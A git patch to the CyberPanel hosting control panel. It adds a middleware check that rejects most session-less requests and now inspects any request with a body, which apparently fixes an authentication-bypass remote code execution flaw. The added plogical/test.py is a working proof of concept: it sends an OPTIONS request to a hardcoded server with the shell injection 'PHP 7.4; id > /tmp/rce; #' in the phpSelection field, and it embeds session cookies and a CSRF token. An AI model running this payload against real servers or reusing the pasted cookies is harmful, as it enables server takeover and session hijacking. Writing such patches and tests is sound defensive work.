From 793b04364ac28382f99f5194f4ede7b525e24f53 Mon Sep 17 00:00:00 2001 From: usmannasir Date: Fri, 1 Nov 2024 10:58:02 +0400 Subject: [PATCH] added global session detector for further security --- CyberCP/secMiddleware.py | 63 +++++++++++++++++++++++++++------------- api/views.py | 1 - plogical/test.py | 39 +++++++++++++++++++++++++ 3 files changed, 82 insertions(+), 21 deletions(-) diff --git a/CyberCP/secMiddleware.py b/CyberCP/secMiddleware.py index d0fc778d7..0b66c6ed1 100755 --- a/CyberCP/secMiddleware.py +++ b/CyberCP/secMiddleware.py @@ -22,6 +22,45 @@ def __init__(self, get_response): self.get_response = get_response def __call__(self, request): + + ###### + + from plogical.processUtilities import ProcessUtilities + FinalURL = request.build_absolute_uri().split('?')[0] + + from urllib.parse import urlparse + pathActual = urlparse(FinalURL).path + + if os.path.exists(ProcessUtilities.debugPath): + logging.writeToFile(f'Path vs the final url : {pathActual}') + logging.writeToFile(FinalURL) + + if pathActual == '/' or pathActual == '/verifyLogin' or pathActual == '/logout' or pathActual.startswith('/api')\ + or pathActual.endswith('/webhook') or pathActual.startswith('/cloudAPI') or pathActual.endswith('/gitNotify'): + pass + else: + try: + val = request.session['userID'] + except: + if bool(request.body): + final_dic = { + 'error_message': "This request need session.", + "errorMessage": "This request need session."} + final_json = json.dumps(final_dic) + return HttpResponse(final_json) + else: + from django.shortcuts import redirect + from loginSystem.views import loadLoginPage + return redirect(loadLoginPage) + + # if os.path.exists(ProcessUtilities.debugPath): + # logging.writeToFile(f'Final actual URL without QS {FinalURL}') + + if os.path.exists(ProcessUtilities.debugPath): + logging.writeToFile(f'Request method {request.method.lower()}') + + ########################## + try: uID = request.session['userID'] admin = Administrator.objects.get(pk=uID) @@ -53,26 +92,7 @@ def __call__(self, request): except: pass - from plogical.processUtilities import ProcessUtilities - FinalURL = request.build_absolute_uri().split('?')[0] - - if os.path.exists(ProcessUtilities.debugPath): - logging.writeToFile(request.build_absolute_uri()) - logging.writeToFile(FinalURL) - - - if FinalURL == '/' or FinalURL == '/verifyLogin' or FinalURL == '/logout': - if os.path.exists(ProcessUtilities.debugPath): - logging.writeToFile(request.build_absolute_uri()) - - - # if os.path.exists(ProcessUtilities.debugPath): - # logging.writeToFile(f'Final actual URL without QS {FinalURL}') - - if os.path.exists(ProcessUtilities.debugPath): - logging.writeToFile(f'Request method {request.method.lower()}') - - if request.method.lower() == 'post' or request.method.lower() == 'options': + if bool(request.body): try: # logging.writeToFile(request.body) @@ -154,6 +174,9 @@ def __call__(self, request): logging.writeToFile(str(msg)) response = self.get_response(request) return response + else: + if os.path.exists(ProcessUtilities.debugPath): + logging.writeToFile('Request does not have a body.') # else: # try: # if request.path.find('cloudAPI/') > -1 or request.path.find('api/') > -1: diff --git a/api/views.py b/api/views.py index 342ca642d..0c12c1e56 100755 --- a/api/views.py +++ b/api/views.py @@ -92,7 +92,6 @@ def getPackagesListAPI(request): json_data = json.dumps(data_ret) return HttpResponse(json_data) - @csrf_exempt def getUserInfo(request): try: diff --git a/plogical/test.py b/plogical/test.py index e69de29bb..89f36eee9 100644 --- a/plogical/test.py +++ b/plogical/test.py @@ -0,0 +1,39 @@ +import requests + +url = "https://95.217.125.210:8090/websites/submitWebsiteCreation" +headers = { + "Host": "95.217.125.210:8090", + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate, br, zstd", + "Referer": "https://95.217.125.210:8090/", + "Connection": "keep-alive", + "Cookie": "csrftoken=yWFDXndgjcsNYj7z8IYozbCQUBj4eLjXsG14u1PQay1lrwohlnqLHG5fwTuRC8I0; smtoken=7c09dd03817bdfebcaf0a97be32628c480663479; django_language=en; SignonSession=422tgvnrnd2f97lem1e2q0l76l; AIOHTTP_SESSION=\"gAAAAABnG8rXm2L1JmWTEqI8BGKHlWUvCQLuvN_VXWu-6r25Rk811sSjtcEK1-kuE-TrQTOwmN2K2xianVlqB3d70QcTeuQwH6a8yRfpi1UMDlysd8W10Xk8h4I_H77EFhZ01d05GImBipmznQIrQ54ZUBWt7ygx8JW52DYaG94Rd9slB3CZqpc=\"; sessionid=tsiqhd7qkcqh393qkdy7oteiagb046sl", + "Upgrade-Insecure-Requests": "1", + "Sec-Fetch-Dest": "document", + "Sec-Fetch-Mode": "navigate", + "Sec-Fetch-Site": "same-origin", + "Sec-Fetch-User": "?1", + "Priority": "u=0, i", + "Pragma": "no-cache", + "Cache-Control": "no-cache" +} + +data = { + "package": "Default", + "domainName": "cyberpanel.net", + "ownerEmail": "cyber@gmail.com", + "phpSelection": "PHP 7.4; id > /tmp/rce; #", + "ssl": "on", + "websiteOwner": "admin", + "dkimCheck": "0", + "openBasedir": "on", + "mailDomain": "0", + "apacheBackend": "0" +} + +response = requests.options(url, headers=headers, json=data, verify=False) + +print(response.status_code) +print(response.text) \ No newline at end of file